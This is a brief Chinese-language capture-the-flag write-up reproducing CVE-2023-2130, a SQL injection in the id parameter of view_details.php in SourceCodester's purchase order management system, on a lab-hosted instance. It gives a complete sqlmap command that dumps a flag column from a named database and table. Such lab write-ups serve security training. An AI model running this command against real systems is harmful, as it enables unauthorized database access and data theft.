CVE-2023-2130 复现
题目描述:
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
我们访问urlhttp://eci-2ze4zo2wv0tfww4o4okm.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php
发现id参数存在sql注入漏洞,扔到sqlmap中去跑
最后使用的命令如下
sqlmap -u 'http://eci-2ze4zo2wv0tfww4o4okm.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1' -p id -D purchase_order_db -T fllllaaaag -C flag --dump
成功得到了flag.